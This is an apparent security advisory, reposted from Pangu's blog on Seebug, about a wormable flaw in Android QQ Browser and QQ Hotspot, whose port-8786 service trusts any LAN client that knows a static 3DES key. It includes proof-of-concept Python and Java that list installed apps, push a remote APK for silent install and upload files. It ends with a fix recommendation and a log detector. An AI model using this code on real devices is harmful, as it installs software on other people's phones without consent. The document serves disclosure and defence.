SSV:92441
Sep 27, 2016

QQ browser Wormable Browser vulnerability

Root
www.seebug.org

Source link: http://blog.pangu.io/wormable-browser/

Vulnerability description

When wifi is enabled, Android QQ Browser, QQ Hotspot and other applications start a local service that listens on port 8786 on every local IP address, not only on loopback. When the attacker and the victim are on the same LAN, this interface lets the attacker upload data to any device on the LAN that is running QQ Browser or QQ Hotspot and trigger an application installation. Where these applications hold root permission, the mobile application can be installed silently. When the attacker and the victim are on different LANs, a malicious link can be used to implant the attacker remotely; once one device is infected, every host on that device's LAN that runs the Android QQ Browser, QQ Hotspot or similar applications can be infected in turn.

Vulnerability details

Discovery process: a search on the Janus platform showed that QQ Browser exposes a service on the local network.

The application accepts the incoming connection and dispatches the request to its handle method for processing.

Sending the bind command passes the service's verification; other commands, such as downloadandinstall, can then be used for remote control.

Vulnerability proof

1. Remotely retrieve the list of installed applications.

```python
#!/usr/bin/env python2
# -*- coding: utf-8 -*-

import requests
import base64
from binascii import b2a_hex, a2b_hex
from pyDes import *

payload = ""

# Client uuid and the static 3DES key the service uses
x_uuid = "d661d51862c23e397d14cb0eb2bf46f4"
key = "kM7hYp8lE69UjidhlPbD98Pm"


def encode_(s):
    # 3DES-ECB with PKCS5 padding, then base64 (the scheme the app expects)
    e_scheme = triple_des(key, ECB, "\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)
    r = e_scheme.encrypt(s)
    return base64.b64encode(r)


def decode_(s):
    b = base64.b64decode(s)
    e_scheme = triple_des(key, ECB, "\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)
    return e_scheme.decrypt(b)


def req(payload):
    headers = {
        'Content-Length': str(len(payload)),
        'Content-Type': 'application/x-www-form-urlencoded',
        'Host': '127.0.0.1',
        'Connection': 'close',
        'Accept-Encoding': 'gzip',
    }
    try:
        # bind first (the only "authentication" step), then query the app list
        r = requests.post("http://192.168.31.160:8786/bind?uuid=" + x_uuid, data=payload, headers=headers)
        r = requests.get("http://192.168.31.160:8786/getapplist?uuid=" + x_uuid)
    except Exception:
        print "Error"
        return

    print r.status_code
    print r.content
    if r.content != '':
        print decode_(r.content)
    print r.headers


if __name__ == "__main__":
    # the bind payload is encrypted twice, as the service expects
    stage1 = encode_("{'code':'123456','uuid':" + x_uuid + "}")
    stage2 = encode_(stage1)
    req(stage2)
```

2. Remotely download and install an application.

```java
String apkdetail = "{'pkgName':'com.wandoujia.phoenix2',"
    + "'url':'http://a.wdjcdn.com/release/files/phoenix/5.19.1.12038/wandoujia-wandoujia-web_direct_binded_5.19.1.12038.apk',"
    + "'name':'wandoujia-wandoujia-web_direct_binded_5.19.1.12038.apk',"
    + "'fileMd5':'3808dbc7092e18ec9e375d54b027162f',"
    + "'autoOpen':'true',"
    + "'installBySys':'false',"
    //+ "'fileFolderPath':","
    + "'forbidRename':'true','length':'6492397','mimeType':'application/x-www-form-urlencoded','hasToast':'true',"
    + "'hasChooserDlg':'true'}";
// b(), f_u, doPost() and uuid belong to the author's Java test harness, which the page does not show;
// the payload is passed through b() twice, matching the double encryption of stage1/stage2 above
String data = b(apkdetail, f_u);
data = b(data, f_u);
resp = doPost("http://192.168.31.156:8786/downloadandinstall?uuid=" + uuid, data);
```

3. Other actions, such as uploading files, can be performed in the same way.

```java
// Util.readFileByLines() and ecStep2 (the double-encrypted bind payload) are from the author's harness
String fileContent = Util.readFileByLines("D:\\迅雷下载\\w.apk");
resp = doPost("http://192.168.31.155:8786/bind?uuid=" + uuid, ecStep2);
resp = doPost("http://192.168.31.155:8786/upload?uuid=" + uuid
    + "&len=6492397&start=0&time=0&name=w.apk&type=apk&fileMd5=3808dbc7092e18ec9e375d54b027162f&installBySys=true",
    fileContent);
```

Solution

Considering the usage scenarios of the two applications, there is little room for repair on the authentication side: both applications authenticate third-party access only by exchanging the uuid under two rounds of 3DES encryption. We therefore recommend that developers show the user the necessary interactive prompt and warning when a third party accesses the interface, so that only authorized users can call the relevant interfaces, and fix the problem at the process level. Searches on the Janus platform found two Tencent apps affected by this vulnerability: QQ Browser and QQ Hotspot.

QQ Browser has the larger impact; testing found that many versions, including the latest, are affected by this vulnerability.
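As an added example that is not part of the original advisory, the following Python detector runs over constructed log lines (in an assumed "<time> <src> -> <dst>:<port> <METHOD> <path>" proxy or firewall format) and flags LAN clients reaching a device's port-8786 service: a /bind from a non-loopback address, and any getapplist, downloadandinstall or upload call that follows it. The IP addresses, uuid values and log format are constructed for the example.

```python
import re
from ipaddress import ip_address

# The local service described above: port 8786, /bind as the gate, then the actions callable once bound.
QQ_PORT = 8786
BIND_PATH = "/bind"
ACTION_PATHS = {"/getapplist", "/downloadandinstall", "/upload"}

# Constructed sample log in an assumed "<ts> <src> -> <dst>:<port> <METHOD> <path>" format.
SAMPLE_LOG = """\
2016-09-27T10:00:01 127.0.0.1 -> 127.0.0.1:8786 POST /bind?uuid=aaaa
2016-09-27T10:00:02 192.168.31.10 -> 192.168.31.160:8786 POST /bind?uuid=d661d518
2016-09-27T10:00:03 192.168.31.10 -> 192.168.31.160:8786 GET /getapplist?uuid=d661d518
2016-09-27T10:00:04 192.168.31.10 -> 192.168.31.160:8786 POST /downloadandinstall?uuid=d661d518
2016-09-27T10:00:05 192.168.31.10 -> 192.168.31.160:80 GET /index.html
2016-09-27T10:00:06 192.168.31.20 -> 192.168.31.160:8786 POST /upload?uuid=d661d518&name=w.apk
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<port>\d+) "
    r"(?P<method>[A-Z]+) (?P<path>/[^?\s]*)(?:\?(?P<query>\S*))?$")

def parse_line(line):
    # Parse one log line into a dict, or return None when it does not match the format
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["port"] = int(ev["port"])
    params = dict(p.split("=", 1) for p in (ev["query"] or "").split("&") if "=" in p)
    ev["uuid"] = params.get("uuid")
    return ev

def find_lan_abuse(log_text):
    """Return (kind, src, dst, path) for non-loopback clients of the port-8786 service:
    a LAN /bind, an action following a LAN bind for the same src/dst/uuid, or an action with no bind seen."""
    bound, alerts = set(), []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if not ev or ev["port"] != QQ_PORT or ip_address(ev["src"]).is_loopback:
            continue  # other ports, or the device's own browser using its own service
        key = (ev["src"], ev["dst"], ev["uuid"])
        if ev["path"] == BIND_PATH:
            bound.add(key)
            alerts.append(("lan_bind", ev["src"], ev["dst"], ev["path"]))
        elif ev["path"] in ACTION_PATHS:
            kind = "post_bind_action" if key in bound else "unbound_action"
            alerts.append((kind, ev["src"], ev["dst"], ev["path"]))
    return alerts
```

Blocking inbound traffic to port 8786 at the network layer, or confirming the app version is one where the service no longer listens on non-loopback addresses, removes the condition these alerts detect.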

Vulnerability discovery

Zhao Shuai, Pangu laboratory researcher

BU Vinci, Pangu laboratory internship researcher